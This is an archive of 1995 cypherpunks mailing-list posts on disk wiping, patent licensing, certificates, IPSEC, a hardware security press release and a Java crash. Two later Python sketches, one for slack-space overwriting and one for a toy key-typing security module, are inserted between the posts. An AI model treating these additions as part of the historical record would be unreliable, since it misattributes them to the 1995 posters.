    Internet:  I'm trying to arrange to get a computer connected to 
	       the net in that room so that we can set up MBONE, 
	       but I don't know if that will be possible or not. 
               

Enough people wrote in to say that they'd like to hear a bit about
Java and HotJava (and how Netscape is using Java) to convince me
it would be a good idea to start off with setting some context. 

See you on Saturday!  Should be fun.  

Marianne
mrm@netcom.com
mrm@eng.sun.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 12 Oct 95 09:41:53 PDT
To: David Berger <dvberger@eit.COM>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510111812.LAA21331@viper.eit.com>
Message-ID: <Pine.SUN.3.90.951012113815.25976A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


I use SSLftp all the time 8)

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 11 Oct 1995, David Berger wrote:

> As a result, the only thing I think this article should say is that we need
> secure ftp.  Isn't this being worked on?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 18:47:53 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: Certificate proposal
In-Reply-To: <199510060419.VAA20574@jobe.shell.portal.com>
Message-ID: <199510120147.LAA13833@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Hal <hfinney@shell.portal.com>
  and cypherpunks@toad.com

Hal writes:
> >In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> >> OK, so suppose I want to send my credit card number to Egghead Software.
...
[previous reply elided]

What you are missing is that you should not say
  "I want to send my credit card number to Egghead Software"
you should say
  "I want to send my credit card number to 12 34 56 78 9A BC DE F0"

> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.

The certificates you'd want are:
  * informal correspondence from your friends that 12 34 56 78 9A BC DE F0
makes good widgets/gadgets/whatzits.
  * a Consumers Association report saying that 12 34 56 78 9A BC DE F0's
widgets don't have sharp edges like 13 25 36 47 58 69 7A 8B's do and
that 43 65 87 09 41 61 BA ED's are less efficient (eg "Choice" magazine).
  * possibly a certificate from the bank that 12 34 56 78 9A BC DE F0
is a merchant (if using traditional CCs).
  * or a certificate from a guarantor company saying that if
12 34 56 78 9A BC DE F0 doesn't deliver they'll return your money.

> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

Yeah, I just can't imagine myself at a party introducing myself
"Hi, I'm 08 04 26 6D 01 CD AB 8A  25 A9 E2 86 AD 13 C1 BA".

Then again I never was good at parties...


To start a new sub-thread: what if the man in the middle is actually
a behaviour-modifying parasite? At that stage even a physical meeting
won't do you much good (the parasite may be otherwise asymptomatic).

It's probably more likely than having 30 FBI agents assigned to your
case...


Hope I'm making sense... (well, they say that hope dies last, no?)

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHxzWSxV6mvvBgf5AQHXawP/Xls4gWUwhTFoX9w4TYaKvqbK8MF+dxgS
JPmIWdfiEijbRb/qOLzU+7NJqZ3OqcR+Ylc8uBcQPhYJgOwDSta1BYm0OrYhb+PY
6ILXeulp/2T5Y061KrbkFgJ3Z5AcsFTCBad2pHQeIzdlIixv2JPT+qbb5iEkDkgA
ebEioYxWgP0=
=pFkN
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:50:35 PDT
To: rah@shipwright.com
Subject: Re: PC disk wipe software
Message-ID: <951012115021_122212260@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-10-09 12:34:33 EDT, you write:

>>PC Tools has a wipe program that will either wipe individual files, or
>>wipe all unallocated diskspace. It also allows you to choose the level
>>of wipe (single overwrite, multiple, etc).
>
>There has been considerable discussion on the MCIP list about how most
>*Mac* programs that purport to do this, like Burn, for example, leave stuff
>over in disk blocks. My understanding is that this is not a trivial
>problem, and it occurs in MUSH-DOS as well....
>
>Cheers,
>Bob Hettinga
>
>

Actually not a problem for mess-DOS: just overwrite to the next multiple of
the allocation unit size. Trivial indeed.  What you must *not* do is just
write to the end of current file ... you have to extend.  Good idea too is to
flush file buffers/reset disk subsystem before the next file writes so that
buffer garbage doesn't get stuck in at end of last sector(s) of new files.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:51:07 PDT
To: perry@piermont.com
Subject: Re: PC disk wipe software
Message-ID: <951012115020_122212234@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


MS-DOS? Selectively overwrite data not alloc'ed to files?  Try this:  I do it
all the time:

open a file for output
write garbage to file until the disk fills
delete file
do it again

... what could be simpler?  This will fill all unused allocation units with
garbage.  Do it until you feel comfortable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GreggMan@aol.com
Date: Thu, 12 Oct 95 08:50:39 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <951012115032_122212345@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 95-10-09 22:07:18 EDT, you write:

>
>Archive data off to tape, low level format drive using the bios hd utils,
>reformat drive, restore data. I find the non graphical AMI bios very useful
>for this.
>
>Doing anything else fails to remove the old data on partially used but valid
>blocks.
>
>

Why do people insist this is the case?
Absolutely not true under MS-DOS.
I haven't personally verified under a VxD file system (like 32bit disk
access) but ask yourself: if I expand (by appending new garbage data) the
current file to the next allocation-unit boundary, will that overwrite the
tail blocks of the current file????  Folks: it's sooooo easy.
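
The slack-overwrite idea from the "PC disk wipe software" messages above, as an added sketch that is not code from any poster: extend the file to the next allocation-unit boundary with garbage, then flush. The function names and the 2048-byte allocation-unit size are assumptions for illustration; the code works at the file API level only and does not inspect where a filesystem or drive actually places the data.

```python
import os
import tempfile


def slack_bytes(size: int, cluster: int) -> int:
    """Bytes between end-of-file and the end of its last allocation unit."""
    if cluster <= 0:
        raise ValueError("cluster size must be positive")
    return (-size) % cluster


def overwrite_with_slack(path: str, cluster: int, passes: int = 1) -> int:
    """Overwrite a file's data plus the tail of its last allocation unit.

    Writing past the current end-of-file extends the file, which is the
    "you have to extend" step from the message. Returns the number of
    bytes covered per pass (always a multiple of `cluster`).
    """
    size = os.path.getsize(path)
    padded = size + slack_bytes(size, cluster)
    # O_BINARY only exists on DOS/Windows-style platforms.
    fd = os.open(path, os.O_WRONLY | getattr(os, "O_BINARY", 0))
    try:
        for _ in range(passes):
            os.lseek(fd, 0, os.SEEK_SET)
            remaining = padded
            while remaining:
                chunk = os.urandom(min(remaining, 64 * 1024))
                # os.write may write less than requested; count what landed.
                remaining -= os.write(fd, chunk)
            # Flush buffers before anything else is written, as the
            # message recommends.
            os.fsync(fd)
    finally:
        os.close(fd)
    return padded


def demo() -> dict:
    """Run the overwrite on a constructed 5000-byte sample file."""
    cluster = 2048  # assumed allocation-unit size; real value is per volume
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "sample.dat")
        with open(path, "wb") as handle:
            handle.write(b"A" * 5000)  # constructed sample content
        before = os.path.getsize(path)
        covered = overwrite_with_slack(path, cluster, passes=2)
        after = os.path.getsize(path)
        with open(path, "rb") as handle:
            leftover = handle.read().count(b"A" * 8)
        os.remove(path)
    return {"before": before, "covered": covered,
            "after": after, "leftover_runs": leftover}


if __name__ == "__main__":
    print(demo())
```
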





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 12 Oct 95 12:00:07 PDT
To: (Recipient list suppressed)
Subject: Cylink license fees
Message-ID: <v02120d03aca31f3702e4@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I just received a very informative package of information
from Bob Fougner at Cylink, which, in addition to a copy
of the relevant patents and hardcopy of the materials
available on their web page, contains a "limited time offer" to
license their patents in one of three ways:

  1) Practice of DH Key exchange & DSS:     $50,000

  2) Right to use & distribute RSA:         $62,500

  3) Unlimited field of use to practice
     public key:                            $75,000

Those interested in obtaining this information should
probably fax him at  408-735-6642 with a request for
the info. Much of the information is available online
at: http://www.cylink.com.

Obviously, anyone wishing to practice RSA would also
need to get a license from RSADSI.

Also, it is my impression that they are claiming Hellman-Merkle
as the precursor patent to RSA, which means that this
situation will prevail at least through late 1997, not early
1997 (when Hellman-Diffie expires.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kelly Goen <kelly@netcom.com>
Date: Thu, 12 Oct 95 13:19:43 PDT
To: mrm@netcom.com (Marianne Mueller)
Subject: Re: Oct 14 meeting, focus on Java, Mountain View, California
In-Reply-To: <199510121831.LAA02357@netcom20.netcom.com>
Message-ID: <199510121911.MAA07717@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall you from the compiler group at sun(SUNPRO)
I think we met at tom kesslers going away party
are you that person???

    cheers
    kelly




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 19:23:06 PDT
To: Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)
Subject: Re: Elementrix Press Release
In-Reply-To: <m0t0p9k-000BVpC@ulf.mali.sub.org>
Message-ID: <199510120222.MAA13959@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Ulf.Moeller@hamburg.netsurf.de (Ulf Moeller)

- From the press release:
> >    "Elementrix has found a logical way to generate non-algorithmic,
> >dynamically changing keys at two separate sites without transmitting
> >them on the line and without using parallel lines," said Dr. David Kahn,

Ulf Moeller responds:
> Obviously they have invented a telepathic key exchange scheme.

Actually, when I read the above I thought of Quantum Mechanics, 
but I would expect you'd need special hardware for that.
(In fact I'd expect you'd need special comms lines for that, but
certainly at least the equipment at the two ends.)

Still, who knows what surprises QM can provide?

In which case calling it a "telepathic key exchange scheme" might
be quite appropriate :-)


However, Occam's razor points to cluelessness.

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHx7uCxV6mvvBgf5AQEkVAP+NBgn59bOX+ydhcmz2HNSC1k6qdr6Y5xE
bre/zepTJ2h1v+8cSQfJMLNfiA36bBtGxxpPvV09Ojn9KJTZhmvyCtN99VG71DZc
SxL/ji0KnWCFkAT4v2IKSK4vUwAs71GjXeNb9RicrcfIOPc7FAFyJZ9DsGbQUUZ2
eoVsPkde4K8=
=OJs9
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 09:36:33 PDT
To: Nesta Stubbs <nesta@cynico.com>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.BSD.3.91.951011223850.13193B-100000@miso.wwa.com>
Message-ID: <199510121636.MAA20825@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Nesta Stubbs writes:
> note: is anyone working on implementing some of the things outlined in
> R(1825?) ?  I think Perry posted regarding it awhile back, but haven't
> heard much about it since.

Yes, work is going on on the IPSEC stuff, though my own is stalled at
the moment because of excessive personal scheduling load...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 09:41:24 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <9510120410.AA28665@sulphur.osf.org>
Message-ID: <199510121638.MAA20833@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> >        I understand though, that we can't control what the reporters
> >say and how they interpret what we say. It is very important to word
> >your posts carefully such that when you post a bug a reporter won't
> >think that they should write an article on it until it is verified.
> 
> NO!
> 
> Something like Perry's "Do not redistribute without permission" should
> be the only modification needed.

I am frequently informed before people redistribute, but not always,
I'm afraid.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 12 Oct 95 10:47:17 PDT
To: cypherpunks@toad.com
Subject: Privsoft
Message-ID: <199510121746.NAA01600@soggy-fibers.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I hope Mr. Orrin has his asbestos codpiece well positioned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 21:01:12 PDT
To: bryce@colorado.edu
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510070102.TAA14826@nagina.cs.colorado.edu>
Message-ID: <199510120358.NAA14220@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and hallc@cs.colorado.edu
  and Bryce <wilcoxb@nagina.cs.colorado.edu>

Bryce wrote:
... [about MITM] ...
> all a True Name is really necessary for
> is violence.  (And, pending certain eagerly-awaited technological
> developments, for sex.))
...

Why is a true name necessary for sex? It should be feasible to arrange
a romantic rendezvous without True Names, no?
How often have you checked IDs before going on a date?

(I think most normal people would notice a MITM during, er, never mind.)

You simply arrange time, place, sign/counter-sign.

Anything I've missed?

> Now I have four things to say about this "evasion of Mitch" thing.
> Don't worry, they are all short and some of them are interesting.
...

For thing number five from your next post: I find it amusing that
octets seven and eight of my fingerprint resemble the name of
a certain Swedish group of singers. Mama mia!


Here I go again, my my, how can I resist... stop humming to yourself!

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lesan <lesan_robert@tandem.com>
Date: Thu, 12 Oct 95 12:01:10 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <307D818B.1D33@tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


I am a contractor currently working for Tandem Computers, and I found this 
press release interesting.  Thought this group might need a target of a 
different flavor to kick around:


SUBJECT: PRESS RELEASE: ATALLA WEBSAFE

ATALLA BEGINS SHIPPING HARDWARE-BASED SECURITY FOR THE INTERNET

SAN JOSE, CALIFORNIA - October 2, 1995 - Atalla, a Tandem
Company, announces that the WebSafe Internet Security Processor
is ready for shipment. Now you can use the same technology that made
the "bank ATM" network safe enough for bank transactions to secure
the Internet for commerce.

"The Internet is a 'party-line' where everyone can jump in. Our vision
is to make it a 'private-line' for those situations where privacy is
essential for doing business on the Net," says Bob Gargus, President
of Atalla. "When we set out to build WebSafe, we wanted a system safe
enough to do bank transactions on the Internet. We're taking our 23
years of experience in financial network security systems and applying
it to the Internet. WebSafe is the first Internet processor that gives
banks and our other customers the security that they have come to
trust Atalla to deliver," Mr. Gargus also noted.

WebSafe is a hardware-based security processor specifically designed
to help transform today's emerging point-to-point Internet security
into a full end-to-end security system. Typical WebSafe applications
include payments (such as credit cards), web commerce, certification
authorities (electronic notarization), PEM (Privacy Enhanced Mail)
and EDI. WebSafe's security architecture is the perfect solution for
banks, brokerage houses, telecommunications companies, legal and
medical institutions or anyone who needs to send sensitive data across
the Internet. This revolutionary product protects transaction data
against unauthorized access, disclosure, alteration, duplications and
substitution. WebSafe supports both public (e.g. RSA) and secret key
(e.g. DES) technology and employs sophisticated key management
similar to global EFT/POS payment networks.

HOW THE WEBSAFE WORKS
Attached as a peripheral device to your Web servers, the WebSafe
processes your secret information in a "hardware-secured envelope."
But unlike software security solutions which are vulnerable to attack
from cyber-pirates, the WebSafe is both physically and logically
secure. Physically secure means that if anyone tries to penetrate the
WebSafe, it will "zeroize," erasing the secret data so it's impossible
to retrieve. Logically secure means that, because all of the security
processing is done within the WebSafe security processor, it's
impossible for anyone to ever see your cryptographic material.

WEBSAFE IS THE BRIDGE FROM THE INTERNET TO THE
PAYMENT NETWORK
The best example of a major deployment of an end-to-end security
network is the bank ATM system. Today, 100% of all bank ATM
transactions in North America have hardware-based security, 70% of
which is provided by Atalla. The Internet is currently going through
the same evolution that the bank ATM network went through 20-plus
years ago. What's holding back electronic commerce on the Internet
today is payments. The truth is, banks are the payment network. You
simply can't have payments without them. However, the bank payment
network and the Internet operate very differently.  For example, the
bank payment network primarily relies on secret keys (like DES) for
security, while the Internet typically relies on both secret and
public keys (like RSA). But because the two networks operate
differently, a bridge needs to be built between them. "WebSafe is the
bridge from the bank payment network to the Internet.  It combines
the best of both worlds (DES and RSA) into a single unit. And, it's
the only secure DES to RSA translation device available today...
The point is, we're not reinventing here. We're taking proven
technology that has been time tested, under the most demanding
conditions, and applying it to the Internet," states Gary Sabo,
Vice President of Product Management and Marketing for Atalla.

WEBSAFE'S CERTIFICATION AUTHORITY SUPPORT:
HOW TO VOUCH FOR SOMEONE ON THE INTERNET.
One new service that is arising is the need for electronic
notarization by Certification Authorities. They'll provide proof
that you are who you say you are. Major credit card companies, banks,
telecommunications companies and post offices are the most likely
institutions to pick up this role. The WebSafe is designed to be the
cornerstone for supplying cryptographic services for Certification
Authorities.

WEBSAFE'S SECURE KEY MANAGEMENT.
When most people talk about cryptographic security, they're talking
about a single key type. It's impossible to have security with this
method. There must be different keys for different functions. Atalla
employs a key architecture that includes hierarchal support for a wide
variety of key types, such as: Key exchange key, data encryption (DES
and RSA), PIN data, Message Authentication Code (MAC), digital
signatures, and certificates. Applying different key types for
different functions restricts how a key is used and can prevent a
security system from being spoofed into giving up secret data.
This way, even through the most complicated series of transactions,
your data is kept secure.

Founded in 1972 and acquired in 1987
by Tandem Computers Corporation, Atalla designs, manufactures
and supports secure on-line transaction automation systems for
financial, retail and business applications. Atalla's products
include POS/POE credit/debit payment terminals, check readers,
security processors for the Internet and other networks, customer
authorization and PIN selection terminals and secure enrollment
products for banks, retailers and state EBTs. The company is
headquartered at 2304 Zanker Road, San Jose, CA 95131.
Phone: (408) 435-8850, (800) 523-9981. Fax: (408) 435-1116.
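
The key-typing idea in the press release's key management section, as an added Python example (not Atalla's design or code, and not part of the original post): a toy security module wraps each working key under a key-encrypting key derived from its type, so a PIN key presented to the data-decryption function fails to unwrap. The class, function and type names are assumptions of this example, and the HMAC-based cipher is a stand-in for a real one.

```python
import hashlib
import hmac
import os


class UsageError(Exception):
    """A key blob was presented to a function it was not issued for."""


def _prf(key, label):
    return hmac.new(key, label, hashlib.sha256).digest()


def _stream(key, nonce, length):
    # HMAC-SHA256 in counter mode; enough for the short values used here.
    blocks = [_prf(key, b"ks" + nonce + bytes([i])) for i in range(length // 32 + 1)]
    return b"".join(blocks)[:length]


def _seal(key, plaintext):
    # Encrypt-then-MAC built only from HMAC, so the example needs no
    # third-party package. It stands in for the module's real cipher.
    nonce = os.urandom(16)
    body = bytes(p ^ s for p, s in zip(plaintext, _stream(key, nonce, len(plaintext))))
    return nonce + body + _prf(key, b"tag" + nonce + body)


def _open(key, blob):
    nonce, body, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, _prf(key, b"tag" + nonce + body)):
        raise ValueError("authentication failed")
    return bytes(c ^ s for c, s in zip(body, _stream(key, nonce, len(body))))


class SecurityModule:
    """Toy model of a hardware module: the master key never leaves it."""

    KEY_TYPES = ("key-exchange", "data", "pin", "mac")  # labels assumed here

    def __init__(self):
        self._master = os.urandom(32)

    def _kek(self, key_type):
        # One key-encrypting key per key type, all derived from the master key.
        if key_type not in self.KEY_TYPES:
            raise ValueError("unknown key type: %r" % key_type)
        return _prf(self._master, b"kek:" + key_type.encode())

    def generate_key(self, key_type):
        """Return a fresh working key, wrapped so it unwraps only as key_type."""
        return _seal(self._kek(key_type), os.urandom(32))

    def _working_key(self, key_type, key_blob):
        try:
            return _open(self._kek(key_type), key_blob)
        except ValueError:
            raise UsageError("key blob is not a %r key" % key_type) from None

    def encrypt_data(self, key_blob, data):
        return _seal(self._working_key("data", key_blob), data)

    def decrypt_data(self, key_blob, ciphertext):
        return _open(self._working_key("data", key_blob), ciphertext)

    def encrypt_pin(self, key_blob, pin):
        return _seal(self._working_key("pin", key_blob), pin.encode())

    def verify_pin(self, key_blob, pin_block, candidate):
        # The clear PIN is compared inside the module and never returned.
        pin = _open(self._working_key("pin", key_blob), pin_block)
        return hmac.compare_digest(pin, candidate.encode())


def demo():
    hsm = SecurityModule()
    data_key = hsm.generate_key("data")
    pin_key = hsm.generate_key("pin")
    pin_block = hsm.encrypt_pin(pin_key, "4921")          # constructed PIN
    record = hsm.encrypt_data(data_key, b"invoice 17")    # constructed data
    results = {
        "data_roundtrip": hsm.decrypt_data(data_key, record),
        "pin_ok": hsm.verify_pin(pin_key, pin_block, "4921"),
    }
    # The spoofing attempt that key typing blocks: the host asks the general
    # data-decryption function to open a PIN block with the PIN key.
    try:
        hsm.decrypt_data(pin_key, pin_block)
        results["pin_leaked"] = True
    except UsageError:
        results["pin_leaked"] = False
    return results


if __name__ == "__main__":
    print(demo())
```

If `_working_key` ignored the type and unwrapped every blob under one key, the last call in `demo()` would return the clear PIN to the host.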




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 11:00:42 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121551.IAA14535@infinity.c2.org>
Message-ID: <199510121759.NAA22465@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sameer writes:
> > Well, in addition, universal deployment of Photuris and IPSP would
> > probably prevent the sort of active attack being discussed because you
> > could no longer replace the packets.
> 
> 	Do you think the major OS/router vendors are going to
> implement IPSP in their stacks with standing export restrictions? I
> don't think so.

I do, because if they want to be IPv6 compliant they have to. They'll
have to produce separate export versions of the software.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Thu, 12 Oct 95 11:14:54 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Data Security, Inc. To Exclusively License Rights to RSA
In-Reply-To: <9509128135.AA813510342@snail.rsa.com>
Message-ID: <9510121814.AA02009@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> RSA Data Security, Inc. 
> today announced that it is now licensing patents for the Digital Signature 
> Standard (DSS), the U.S. government standard for digital signatures.

I believe someone was suing the U.S. government on the grounds that the
public signature standard wasn't supposed to require proprietary 
technology.  Has this gone anywhere yet?

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 22:10:23 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <Pine.3.89.9510112155.A49472-0100000@aix2.uottawa.ca>
Message-ID: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello s1018954@aix2.uottawa.ca
 
> On Thu, 12 Oct 1995, Jiri Baum wrote:
> 
> > 
> > Perhaps somebody should make IDEA shorts?
> > 
> > Then it would be interoperable with PGP...
> > (Would tooooo. You just have to remember what the header is.)
> 
> You'd still need an MD5 necktie.

Actually, you don't - you just don't get signatures without it.
However, authentication AFAIK was never a problem to export,
so there's no need to bother.

If you are reading a signed message, you simply strip off the
signature without checking it (or you leave it on and pass it
through a hypothetical exportable auth-only PGP).

For creating messages, you have to make do without signatures.

What you *would* need would be a coin, but I guess this is
generally available (you know, flip it a hundred times to
generate the session key).

> (and your matching stealth sunglasses? When does this go too far?
> This ridiculous looking figure is begging for its own worlds chat avatar.
> Violate ITAR and good fashion in vr. Which begs the question, would anyone
> notice if First Cypherpunks Bank were operating in such a networked video 
> game? Now *that* would be a non-bank financial institution. I can just 
> see it in court: "your honor, the disclaimer clearly says it is all a game,
> the state's agents have simply suspended all disbelief". Talk about stego.)

Hmm, just like Monopoly money, I guess.

Nobody's been busted yet for printing that, have they.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 15:11:52 PDT
To: cypherpunks@toad.com
Subject: Netscape 2.0b1J still core dumps on Java
Message-ID: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I pointed the latest beta (Solaris 2.4) towards this URL:

http://java.sun.com/JDK-prebeta1/applets/CardTest/example1.html

...and, lo and behold, it core dumped with a Bus error. It's unlikely
that the bug is in Java itself, as I was able to successfully run the
example from Sun's JDK appletviewer.

Not impressed yet.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Oct 95 12:19:29 PDT
To: cypherpunks@toad.com
Subject: (fwd) checkfree/cybercash diff
Message-ID: <v02120d10aca3190df3c1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Thu, 12 Oct 95 14:34:46 +0100
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
To: www-buyinfo@allegra.att.com
Subject: checkfree/cybercash diff

Hi all,

I studied both websites regarding their wallet system. I noticed a press
release that checkfree will license cybercash technology and develop
products. I saw _no_ release that checkfree has already released a cybercash
wallet compatible SW.

But I cannot find any difference between cybercash wallet and checkfree wallet.
Is it behind the open part of the tech information?

Who can make things clear???


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Thu, 12 Oct 95 12:37:02 PDT
To: John Lull <lull@acm.org>
Subject: Re: java security concerns
In-Reply-To: <199510101714.KAA07329@ix2.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951012154149.13206E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, John Lull wrote:

> On Mon, 09 Oct 1995 17:30:38 -0700, cmcmanis@scndprsn.Eng.Sun.COM
> (Chuck McManis) wrote:
> 
> > >By the way, I suggest that Sun should offer a large money prize for
> > >the first significant security hole found in the Java implementation. It's
> > >a tiny price to pay for security.
> > 
> > I don't think the lawyers would let us. 
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I think this means they didn't ask.
If they did, perhaps the problem is their ability to say with a straight 
face that their product is "secure" while at the same time running a 
contest to find insecurities!

EBD


> 
> Pardon my French, but if your lawyers make it impossible to do
> technical work correctly, isn't it time to get new lawyers?  I can't
> see how offering a reward for reporting bugs could possibly be
> objectionable to any rational lawyer.
> 
> This can be a VERY useful (and very inexpensive) debugging technique.
> Didn't Knuth offer a cash reward to the first person to find each typo
> in his "Fundamental Algorithms" series -- and then doubled the amount
> each year?
> 
> It can also be a very useful teaching tool, in that it encourages
> users to explore little-used corners of a system.
> 
> I applaud any company that has the guts to do it.
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 15:48:56 PDT
To: cypherpunks@toad.com
Subject: http://www.cs.berkeley.edu/~raph/javatest.html
Message-ID: <199510122248.PAA18979@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Plcurechaxf jevgr pbqr!

Encuc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 12 Oct 95 13:17:13 PDT
To: cypherpunks@toad.com
Subject: smartcard encryption: revised paper available
Message-ID: <9510122024.AA06402@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've put a (slightly expanded) revised version of my paper, "High-
Bandwidth Encryption with Low-Bandwidth Smartcards" in my ftp directory.
This paper describes a little protocol for exploiting the secure key
storage facilities of slow smartcards but with the host processor
doing most of the actual work.

ftp://ftp.research.att.com/dist/mab/card_cipher.ps

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
